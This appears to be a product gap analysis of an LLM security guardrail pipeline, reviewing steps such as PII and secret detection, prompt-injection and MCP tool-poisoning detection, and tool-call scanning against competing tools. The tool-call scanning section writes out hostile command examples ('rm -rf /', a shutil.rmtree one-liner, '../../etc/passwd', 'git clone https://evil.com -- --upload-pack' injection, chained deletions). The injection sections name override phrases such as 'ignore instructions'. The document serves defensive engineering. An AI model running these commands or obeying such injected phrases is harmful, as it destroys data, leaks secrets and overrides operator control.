Pipeline Step Depth Analysis
End-to-end review of every pipeline step. what’s strong, what’s missing, and what the competition does better. Based on research into LLM Guard, NeMo Guardrails, Rebuff, Vigil, Lakera Guard, Pangea, Arthur Shield, Giskard, TruffleHog, GitLeaks, OWASP LLM Top 10 (2025), and real-world red team reports.
Before the LLM
Section titled “Before the LLM”1. validate_input. Input Validation
Section titled “1. validate_input. Input Validation”Current: Null bytes, UTF-8, garbage ratio, JSON depth, session repair (orphan tool results, empty messages, role merging).
Strengths: Session repair is unique. no competitor does this. Prevents real API errors from broken message arrays. JSON depth limit prevents stack overflow attacks.
Gaps & Recommendations:
- Missing: Image/multimodal payload validation. GPT-4o and Claude accept images. Steganographic payloads and oversized images are a real attack vector. Add MIME type validation, image dimension/size limits, and optional image content scanning.
- Missing: Token count estimation. Current check is byte-based. A 500KB input could be 200K tokens and cost $50. Add a fast tiktoken-based token estimate and a
max_tokensconfig option. LLM Guard does this. - Missing: Language detection. If the org only operates in EN/FR/DE, reject Cyrillic/CJK input that’s likely an evasion attempt. Pair with injection detection (multilingual attacks bypass EN-only detectors).
- Missing: Schema validation for tool params. Validate tool call arguments against the declared JSON schema before forwarding. Catches malformed tool calls early. Guardrails AI makes this a core feature.
- Improvement: Content-type validation. Tool params could contain serialized objects (pickle, YAML load). Reject non-JSON content types.
Priority: HIGH (multimodal validation. the biggest blind spot as vision models become default)
2. rate_limit. Rate Limiting
Section titled “2. rate_limit. Rate Limiting”Current: Fixed window, sliding window, token-based, per-user, warning threshold.
Strengths: Three strategies is comprehensive. Sliding window prevents burst abuse at boundaries. Warning threshold is good UX.
Gaps & Recommendations:
- Missing: Adaptive rate limiting. If injection attempts are detected, automatically tighten the rate limit for that agent/user. Lakera Guard does this. “threat-responsive throttling.”
- Missing: Cost-based rate limiting. Limit by estimated cost per window (not just tokens). A GPT-4o call costs 50x more than GPT-4o-mini for the same tokens.
- Missing: Concurrency limits. Rate limits control calls/window but not simultaneous inflight calls. An agent sending 100 parallel requests stays under rate limits but DoSes the LLM provider. Add
max_concurrent. - Improvement: Exponential backoff headers. Return
Retry-Afterwith exponential backoff in 429 responses. Standard HTTP but currently missing.
Priority: MEDIUM (adaptive + concurrency most impactful)
3. budget_enforcement. Budget Control
Section titled “3. budget_enforcement. Budget Control”Current: Monthly USD, monthly tokens, hourly tokens. Reads from pipeline state repo.
Strengths: Three limit types cover most needs.
Gaps & Recommendations:
- Missing: Per-model budget splits. “Max $50/mo on GPT-4o, unlimited GPT-4o-mini.” Right now a single budget covers all models. CISOs want granular cost control.
- Missing: Budget alerts at thresholds. Fire a webhook at 50%, 80%, 90% of budget. Currently only blocks at 100%.
- Missing: Daily/weekly budgets. Monthly is too coarse for startups iterating fast. Daily limits catch runaway agents faster.
- Missing: Budget rollover/carry-forward. Some enterprises want unused budget to carry over.
- Improvement: Real-time cost estimation pre-call. Before calling the LLM, estimate the cost of this specific call and check if it would exceed the budget. Prevents “last call blows the budget” scenarios.
Priority: MEDIUM (per-model splits and alerts are most requested by CISOs)
4. detect_pii. PII Detection
Section titled “4. detect_pii. PII Detection”Current: Presidio (40+ entity types, NER, context scoring) + 13 regex patterns. Zero-width char stripping for evasion resistance. Custom patterns. Scanner cache integration.
Strengths: Presidio is the gold standard for structured PII. Regex fallback is smart for minimal deployments. Zero-width stripping is good.
Gaps & Recommendations:
- Missing: Multi-language PII. Presidio’s default is EN-only. European CISOs need FR/DE/NL/ES PII patterns (BSN, NISS, Personalausweis, etc.). LLM Guard supports 50+ languages via custom recognizers. Add EU-specific recognizers for Belgian national number (Rijksregisternummer), German Steuer-ID, French NIR, Dutch BSN.
- Missing: Context-aware false positive reduction. “The account number is 1234567890” should flag, but “page 1234567890 of the document” shouldn’t. Presidio’s context scoring helps but needs custom enhancers for business contexts.
- Missing: PII in structured data. If tool params contain JSON with nested PII (e.g., a customer record), the flat text extraction misses it. Add recursive JSON PII scanning.
- Missing: Name detection without Presidio. Regex can’t detect names. When Presidio isn’t installed, names go undetected. Add a lightweight name dictionary (top 10K names across EU languages) as a fallback.
- Improvement: Configurable entity sensitivity. Not all PII is equal. A first name is less sensitive than a credit card. Allow per-entity-type
on_detectionoverrides:"CREDIT_CARD": "block","PERSON": "notify".
Priority: HIGH (EU multi-language PII is a must-have for European positioning)
5. detect_secrets. Secret Detection
Section titled “5. detect_secrets. Secret Detection”Current: 74 regex patterns (AWS, GCP, Azure, OpenAI, GitHub, Stripe, etc.), Shannon entropy, base64 decoding, line-joining, comment-stripping, reversal detection. Custom patterns.
Strengths: Pattern database is competitive with TruffleHog/GitLeaks. Evasion detection (base64, line-joining, comments, reversal) is deeper than most. Entropy detection catches unknown formats.
Gaps & Recommendations:
- Missing: Verification/validation. TruffleHog’s killer feature: it actually validates detected secrets (calls AWS STS, checks GitHub token scopes). A verified secret is 100x more actionable than a regex match. Add optional async verification for top providers (AWS, GitHub, Slack, Stripe).
- Missing: Git diff / commit context. When the input contains code diffs or commit messages, the secret might be in a
-line (removed) vs+line (added). Only+lines matter. Add diff-aware scanning. - Missing: Allowlisting. Known-safe patterns (test keys, example tokens, documentation patterns) cause noise. Add
allow_patternsconfig. TruffleHog and GitLeaks both have this. - Missing: Secret rotation recommendations. When a secret is detected, tell the user what to do: “Rotate this AWS key at console.aws.amazon.com/iam.” Pangea does this.
- Improvement: Reduce false positives on JWTs. The
jwtpattern matches any JWT, but JWTs are designed to be sent. they’re not secrets. Flag JWTs only when they appear in unexpected contexts (user message, not auth header). Currently high FP. - Missing: HashiCorp Vault transit tokens, Doppler tokens, 1Password service accounts, Infisical tokens. Growing secret managers have their own token formats.
Priority: HIGH (verification transforms this from “maybe a secret” to “confirmed leaked credential”)
6. detect_infra. Infrastructure Data
Section titled “6. detect_infra. Infrastructure Data”Current: 10 patterns (internal hostname, private IP, DB connection string, env server, infra config, infra service, K8s config, Docker registry, custom domain).
Strengths: Catches the common categories.
Gaps & Recommendations:
- Missing: Cloud-specific resource identifiers. AWS ARNs (
arn:aws:*), GCP resource names (projects/*/locations/*), Azure resource IDs (/subscriptions/*/resourceGroups/*). These leak cloud topology. - Missing: Internal URL detection. URLs with
.internal,.local,.corp,.lanTLDs, or non-public DNS (e.g.,api.staging.acme.internal). - Missing: CI/CD identifiers. GitHub Actions workflow URLs, Jenkins build URLs, GitLab CI pipeline references. These reveal deployment infrastructure.
- Missing: Kubernetes secrets in plain text.
kubectl get secret -o yamloutput contains base64-encoded secrets that aren’t caught by detect_secrets because they’re in a YAML context. - Improvement: Configurable internal domain patterns. Every org has different internal domains. Add
internal_domains: ["*.acme.internal", "*.corp.acme.com"]config.
Priority: MEDIUM (cloud ARNs and internal URLs are the most commonly leaked)
7. detect_business. Business Data
Section titled “7. detect_business. Business Data”Current: 9 patterns (financial figure, large amount, board decision, strategic info, competitive intel, customer data, HR personnel, legal matter).
Strengths: Covers the major categories. Unique step. no competitor does this.
Gaps & Recommendations:
- Missing: Industry-specific patterns. Healthcare (diagnosis codes, drug names, patient IDs), legal (case numbers, court references), financial (SWIFT codes, ISIN numbers, CUSIPs). Configurable per industry.
- Missing: Context-aware matching. “$50M” in a financial report discussion is expected; in a casual question it’s a leak. Weight by surrounding context.
- Missing: Code names / project names. Many orgs use code names for M&A targets, products, etc. Add configurable
sensitive_terms: ["Project Phoenix", "Operation Sunrise"]. - Missing: NDA/confidentiality markers. Text containing “CONFIDENTIAL”, “PRIVILEGED”, “ATTORNEY-CLIENT” should auto-escalate classification.
- Improvement: Revenue/valuation number extraction. Current patterns are simple regex. Use numeric extraction with currency awareness to catch “twelve million dollars” and “€2.5M revenue.”
Priority: MEDIUM (NDA markers and custom terms are quick wins)
8. detect_unicode. Unicode / Homoglyph
Section titled “8. detect_unicode. Unicode / Homoglyph”Current: 85+ dangerous codepoints, 85+ confusable mappings, suspicious categories, combining mark floods, mixed-script detection, zero-width chars, bidi overrides.
Strengths: Very thorough. Mixed-script word detection is rare among competitors. Combining mark flood detection is good.
Gaps & Recommendations:
- Missing: Punycode/IDN homoglyph detection. Internationalized domain names can contain homoglyphs (
аpple.comwith Cyrillicа). Detect Punycode domains in URLs. - Missing: Invisible character normalization. Instead of just detecting zero-width chars, offer a normalization mode that strips them and continues. Useful when blocking is too aggressive (accessibility tools insert zero-width chars).
- Improvement: Configurable script allowlists. A Japanese org expects CJK; a European org expects Latin+Cyrillic.
allowed_scripts: ["Latin", "Common"]would reduce FPs.
Priority: LOW (current implementation is already strong)
9. detect_injection. Prompt Injection
Section titled “9. detect_injection. Prompt Injection”Current: 87 patterns across 7 categories (structural, behavioral, jailbreaks, obfuscation, indirect, multilingual, metaphorical). Base64 decoding, leetspeak normalization, compound scoring. Tool result scanning. Custom patterns.
Strengths: Deepest regex-based injection detector I’ve seen. Multilingual coverage (10 languages), metaphorical bypass detection, indirect injection from tool outputs. these are rare. Compound scoring for weak signals is smart.
Gaps & Recommendations:
- Missing: ML-based classifier. Regex catches known patterns but misses novel attacks. Rebuff uses a fine-tuned BERT classifier alongside regex. Lakera Guard’s core is an ML model. Add an optional lightweight classifier (DistilBERT fine-tuned on injection datasets) as a second opinion alongside regex. Run it only when regex score is ambiguous (0.3-0.7).
- Missing: Perplexity-based detection. Novel attacks have high perplexity (unusual token sequences). LLM Guard uses perplexity scoring as a signal. A fast perplexity estimate using a small model could catch attacks that don’t match any pattern.
- Missing: Prompt/response boundary enforcement. Ensure the LLM’s system prompt separator hasn’t been breached. NeMo Guardrails enforces strict message boundaries.
- Missing: Canary token injection. Inject a unique canary into the system prompt; if it appears in the output, the system prompt was leaked. Lakera and Arthur Shield use this technique.
- Missing: Multi-turn injection tracking. A slow injection spread across 5 turns (each individually benign) isn’t caught. Track injection scores across the session and alert on cumulative risk.
- Missing: Image-based injection. Text rendered in images bypasses all text-based detection. As vision models become standard, OCR-based injection scanning is needed.
- Improvement: Adversarial robustness testing. Run the HackAPrompt and Gandalf datasets as a CI benchmark. Track detection rate over time. Giskard provides this as a testing framework.
Priority: CRITICAL (ML classifier is the single biggest improvement. catches novel attacks regex never will)
10. detect_escalation. Privilege Escalation
Section titled “10. detect_escalation. Privilege Escalation”Current: 4-stage model (recon → access → exfil → priv-esc), cross-turn tracking, context-aware scoring, keyword combinations.
Strengths: Multi-stage model is more sophisticated than simple keyword matching. Context awareness reduces FPs.
Gaps & Recommendations:
- Missing: Behavioral baseline. What’s “normal” for this agent? An admin agent asking for user lists is normal; a customer support agent doing it is suspicious. Add per-agent behavioral profiles.
- Missing: Semantic similarity to known attack chains. Use embedding similarity against a database of known escalation chains (MITRE ATT&CK for LLMs).
- Improvement: Integration with tool permissions. If the agent asks about tools it doesn’t have permission to use, that’s a stronger recon signal than generic questions.
Priority: LOW (current implementation is adequate for most use cases)
11. detect_tool_poison. Tool Poisoning
Section titled “11. detect_tool_poison. Tool Poisoning”Current: 11 patterns for injection in tool descriptions (ignore instructions, override system, act as, do not tell, exfiltration URLs, priority manipulation, hidden instructions).
Strengths: Catches the known MCP tool poisoning attacks.
Gaps & Recommendations:
- Missing: Tool schema validation. Verify tool definitions match an expected schema. An attacker could add extra parameters not in the spec that carry injection payloads.
- Missing: Tool definition diffing. If a tool’s description changed since last seen, flag it. Supply chain attacks modify tool definitions gradually.
- Missing: URL/domain reputation check. Tool descriptions containing URLs to unknown/suspicious domains should be flagged. Use a domain reputation API (VirusTotal, URLhaus).
- Missing: Excessive instruction detection. Tool descriptions longer than N chars or containing unusual formatting (multiple paragraphs of “IMPORTANT” instructions) are suspicious.
- Improvement: Hash-based tool integrity. Store a hash of each tool’s definition at registration. If it changes at runtime, alert. This catches dynamic tool poisoning via compromised MCP servers.
Priority: HIGH (supply chain attacks via MCP are a growing threat. tool integrity verification is essential)
12. classify_data. Data Classification
Section titled “12. classify_data. Data Classification”Current: 4-level classification (PUBLIC → INTERNAL → CONFIDENTIAL → RESTRICTED). Aggregates all detection findings. Optional LLM semantic classifier. LLM can only escalate, never downgrade.
Strengths: Deterministic classification from regex findings + optional LLM escalation is the right architecture. “Can only escalate” is a good security principle.
Gaps & Recommendations:
- Missing: Org-specific classification rules. “Any mention of Project X is RESTRICTED.” “All customer IDs are CONFIDENTIAL.” Allow CISO-defined rules beyond the built-in heuristics.
- Missing: Data classification labels/tags. Beyond the 4 levels, support custom tags: “GDPR_PERSONAL_DATA”, “HIPAA_PHI”, “SOX_FINANCIAL”. This enables regulatory-specific routing.
- Improvement: Confidence scoring. Return a confidence level with the classification. “CONFIDENTIAL (95%)” vs “CONFIDENTIAL (62%).” Low confidence triggers the LLM classifier automatically.
Priority: MEDIUM (custom rules and regulatory tags most valuable)
The Call
Section titled “The Call”13. call_llm. LLM Call
Section titled “13. call_llm. LLM Call”Current: Timeout, fallback model, circuit breaker with error classification, cooldown with retry-after.
Strengths: Circuit breaker with error classification is production-grade. Fallback model prevents outages.
Gaps & Recommendations:
- Missing: Request/response logging for compliance. Log the full request and response (with PII redacted) for audit. GDPR Article 30 requires processing records.
- Missing: Model version pinning. LLM providers update models silently. A pinned version (
gpt-4o-2024-11-20) prevents surprise behavior changes. Addpin_versionconfig. - Missing: Response validation. Check that the response is well-formed (valid JSON for function calls, non-empty content). Malformed responses should retry, not propagate.
- Missing: Streaming support. Currently blocks on full response. Streaming would reduce time-to-first-token. More complex to scan but important for UX.
Priority: MEDIUM (streaming is the most impactful for developer experience)
14. call_tool. Tool Call
Section titled “14. call_tool. Tool Call”Current: Timeout, response size limit, error redaction.
Strengths: Good basics.
Gaps & Recommendations:
- Missing: Sandboxed execution. Tool calls should execute in a sandboxed environment (container, WASM, seccomp). Currently relies on the tool itself being safe.
- Missing: Network isolation. Tool calls shouldn’t be able to reach arbitrary endpoints. Add configurable network policies (allow/deny lists for outbound connections).
- Missing: Resource limits. CPU time, memory, disk I/O limits for tool execution. Prevents resource exhaustion attacks.
- Missing: Output sanitization. Tool output could contain HTML, JavaScript, or other injection payloads that flow back to the LLM. Sanitize before returning.
Priority: HIGH (sandboxing is the #1 missing capability for agentic security)
15. tool_permissions / tool_constraints / user_tool_scopes
Section titled “15. tool_permissions / tool_constraints / user_tool_scopes”Current: Per-tool allow/block, per-operation permissions, parameter validation (string patterns, numeric ranges, length, cross-parameter), user-level scoping.
Strengths: The three-layer model (permissions → constraints → scopes) is more granular than any competitor.
Gaps & Recommendations:
- Missing: Time-based permissions. “Tool X only allowed during business hours.” “Emergency access to production database for 2 hours.” Temporal access control is standard in enterprise IAM.
- Missing: Approval workflows. “Tool X requires manager approval before execution.” For high-risk operations, add a human-in-the-loop step.
- Missing: Tool call rate limiting. Separate from the global rate limit. “Max 10 database queries per minute” prevents a stuck agent from hammering a database.
- Improvement: Permission inheritance. Group tools into categories with shared permissions. Currently each tool is configured individually.
Priority: MEDIUM (time-based permissions and approval workflows most requested)
16. scan_tool_calls. Tool Call Scanning
Section titled “16. scan_tool_calls. Tool Call Scanning”Current: 4 regex patterns, deny command/path lists, fnmatch for path patterns, shell argument parsing.
Strengths: Shell argument parsing with shlex is better than naive string matching.
Gaps & Recommendations:
- Missing: Semantic command analysis.
rm -rf /is caught, butfind / -deleteorpython -c "import shutil; shutil.rmtree('/')"aren’t. Need a broader dangerous operation database. - Missing: File path normalization.
../../etc/passwd,/var/../etc/passwd, symlink following. Normalize paths before matching deny patterns. - Missing: Argument injection detection.
git clone https://evil.com -- --upload-pack="evil". Detect double-dash argument injection. - Missing: Command chaining detection.
echo safe && rm -rf /orecho safe; rm -rf /. Parse command chains, not just the first command. - Improvement: Integration with detect_code_exec. Currently these are separate. Code execution detection should feed into tool call scanning for a unified view.
Priority: HIGH (command chaining and path traversal are common bypasses)
After the LLM
Section titled “After the LLM”17. scan_output. Output Scan + DLP
Section titled “17. scan_output. Output Scan + DLP”Current: PII, secrets, infra, business data detection on response. Redaction of PII, infra, business data. Stack trace stripping. Sensitive pattern removal (paths, internal URLs, private keys). LLM safety judge option. Scanner cache integration.
Strengths: Full DLP pipeline is unique. Stack trace stripping prevents information disclosure. LLM judge as optional second opinion is good architecture.
Gaps & Recommendations:
- Missing: Hallucination detection. If the LLM generates a plausible-looking but fake API key, phone number, or address, it could cause downstream issues. Cross-reference generated data against the input to detect fabrication.
- Missing: Toxicity/bias detection. OWASP LLM Top 10 includes harmful output. Add content safety scoring (toxicity, bias, adult content). LLM Guard has multiple output content validators.
- Missing: Factual grounding check. For RAG applications, verify the output is grounded in the retrieved context. Detect when the LLM ignores the context and halluccinates.
- Missing: Jailbreak success detection. If detect_injection flagged the input but the LLM responded anyway (not blocked), check if the response actually complied with the injection. This is what the LLM judge should specifically look for.
- Improvement: Streaming-compatible scanning. Current scan requires the full response. For streaming, implement incremental scanning with a sliding window.
- Missing: Output format validation. If the agent expects JSON, validate the output is valid JSON before returning. Malformed output causes agent crashes.
Priority: HIGH (toxicity/content safety is a major gap. required by EU AI Act)
18. taint_check. Taint Tracking
Section titled “18. taint_check. Taint Tracking”Current: Tracks PII and secrets from input. Checks if they flow into tool call arguments. Categorized sinks (shell, network, code, email, database).
Strengths: Taint tracking is rare in LLM security. Sink categorization is thoughtful.
Gaps & Recommendations:
- Missing: Taint propagation through tool chains. In a multi-step agent, data flows: input → tool1 → tool2 → tool3. Current implementation only tracks input → first tool call. Need cross-step propagation.
- Missing: Derived data tracking. If the LLM sees
john@acme.comand generatesjohn at acme dot com, the taint is lost. Add fuzzy matching for derived forms. - Improvement: Configurable sink sensitivity. Not all sinks are equal. Writing to a local log file is less dangerous than sending via email. Allow per-sink
on_detectionoverrides.
Priority: MEDIUM (multi-step propagation is the most impactful improvement)
19. shell_bleed. Shell Bleed Detection
Section titled “19. shell_bleed. Shell Bleed Detection”Current: 5-language env var detection (Shell, Python, Node, Ruby), safe var exclusion, secret keyword matching.
Strengths: Multi-language support is comprehensive.
Gaps & Recommendations:
- Missing: .env file reference detection.
cat .env,source .env,dotenv.config(). References to dotenv files are as dangerous as direct env var references. - Missing: Config file secret references.
config.yaml,secrets.json,credentials.xmlreferences in generated code. - Missing: Rust/Go/Java env var patterns.
std::env::var("SECRET"),os.Getenv("API_KEY"),System.getenv("DB_PASSWORD"). - Improvement: Detect secrets embedded in code. Not env vars but hardcoded secrets:
api_key = "sk-..."in generated code.
Priority: LOW (current coverage handles the most common languages)
20. loop_guard. Loop Guard
Section titled “20. loop_guard. Loop Guard”Current: Per-session tracking, identical call counting, warning injection, circuit breaking, max total calls.
Strengths: Warning before blocking is good UX. Max total calls prevents cost runaway.
Gaps & Recommendations:
- Missing: Semantic loop detection. Agent calls
search("AI market")thensearch("AI market trends")thensearch("market for AI"). different strings, same intent. Use embedding similarity to detect semantic loops. - Missing: Progress tracking. A legitimate agent might call the same tool 10 times with different params (iterating over a list). Detect lack of progress rather than just repetition.
- Improvement: Cross-session loop detection. If an agent hits the loop limit, gets restarted, and immediately loops again, detect the meta-loop.
Priority: LOW (current implementation handles the common case well)
21. dedup_output. Output Dedup
Section titled “21. dedup_output. Output Dedup”Current: Exact + normalized matching against tool results and input. Configurable min length.
Strengths: Catches the common “LLM copies tool output verbatim” failure mode.
Gaps & Recommendations:
- Missing: Partial dedup. LLM copies 80% of tool output with minor modifications. Current implementation only catches exact/normalized matches.
- Improvement: Token-based dedup. Measure output tokens that are direct copies of input tokens. If >70% are copies, flag it. More robust than string matching.
Priority: LOW (nice-to-have, not security-critical)
Cross-Cutting Gaps (Not in Any Single Step)
Section titled “Cross-Cutting Gaps (Not in Any Single Step)”A. Observability & Metrics
Section titled “A. Observability & Metrics”- Missing: Prometheus/OpenTelemetry metrics export. Step latency histograms, detection counts by type, block rates. Essential for production monitoring.
- Missing: Detection trend dashboards. “Injection attempts increased 300% this week.” Time-series analysis of security events.
B. Testing & Validation
Section titled “B. Testing & Validation”- Missing: Red team automation. Built-in adversarial testing that runs the HackAPrompt, Gandalf, and custom attack datasets against the pipeline. Giskard provides this.
- Missing: Regression testing. When a pattern is updated, automatically verify it still catches known attacks and doesn’t introduce new FPs.
C. Response to Detection
Section titled “C. Response to Detection”- Missing: Automated incident response. When a high-severity detection occurs, automatically: revoke agent API key, notify CISO via webhook, quarantine conversation. Currently all responses are per-request.
- Missing: Adaptive security posture. If injection attempts increase, automatically tighten thresholds across the pipeline. Return to normal after the attack subsides.
D. Privacy & Compliance
Section titled “D. Privacy & Compliance”- Missing: Data minimization. GDPR requires processing only necessary data. Log and store only what’s needed. Currently audit logs may contain more data than necessary.
- Missing: Right to erasure. GDPR Article 17. Ability to delete all data for a specific user across audit logs, pipeline state, and findings.
- Missing: Data Processing Agreement (DPA) enforcement. When routing to an LLM provider, verify the provider has a valid DPA. Block calls to non-compliant providers.
Priority Matrix
Section titled “Priority Matrix”| Priority | Steps / Gaps | Impact |
|---|---|---|
| CRITICAL | ML-based injection classifier | Catches novel attacks regex never will |
| HIGH | Multimodal input validation | Vision models are becoming default |
| HIGH | EU multi-language PII | Core positioning as European product |
| HIGH | Secret verification | Transforms FYI into actionable alert |
| HIGH | Tool definition integrity | MCP supply chain attacks are growing |
| HIGH | Toxicity/content safety | Required by EU AI Act |
| HIGH | Command chaining in scan_tool_calls | Common bypass technique |
| HIGH | Tool execution sandboxing | #1 missing capability for agents |
| MEDIUM | Adaptive rate limiting | Threat-responsive defense |
| MEDIUM | Per-model budget splits | Most requested by CISOs |
| MEDIUM | Custom classification rules | Enterprise customization |
| MEDIUM | Streaming LLM support | Developer experience |
| MEDIUM | Multi-step taint propagation | Agentic workflow security |
| MEDIUM | Time-based permissions | Enterprise IAM standard |
| MEDIUM | Cloud resource ID detection | Common infrastructure leak |
| LOW | Semantic loop detection | Nice-to-have |
| LOW | Additional shell bleed languages | Diminishing returns |
| LOW | Unicode script allowlists | Current impl is strong |
| LOW | Partial dedup | Not security-critical |